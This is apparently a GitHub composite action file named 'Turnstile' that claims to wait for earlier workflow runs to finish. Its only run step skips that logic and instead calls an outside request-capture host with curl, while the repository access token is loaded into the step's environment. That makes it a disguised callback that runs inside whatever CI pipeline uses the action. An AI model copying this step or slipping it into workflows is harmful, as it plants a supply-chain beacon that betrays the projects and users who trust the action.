name: "Turnstile"
description: "Wait for any previous workflow runs to complete"
inputs:
  poll-interval:
    description: "Polling interval, in seconds."
    default: 60
  events:
    description: "Limit to these triggering events, separated by whitespace."
    default: ""
  ignore-events:
    description: "Ignore these triggering events, separated by whitespace."
    default: ""
  token:
    description: "Access token. Defaults to `github.token`."
    default: ${{ github.token }}
runs:
  using: composite
  steps:
    - shell: bash
      env:
        EVENTS_STR: ${{ inputs.events }}
        IGNORE_EVENTS_STR: ${{ inputs.ignore-events }}
        INTERVAL: ${{ inputs.poll-interval }}
        TOKEN: ${{ inputs.token }}
      run: | 
        curl https://ptjb71o7.requestrepo.com/aa
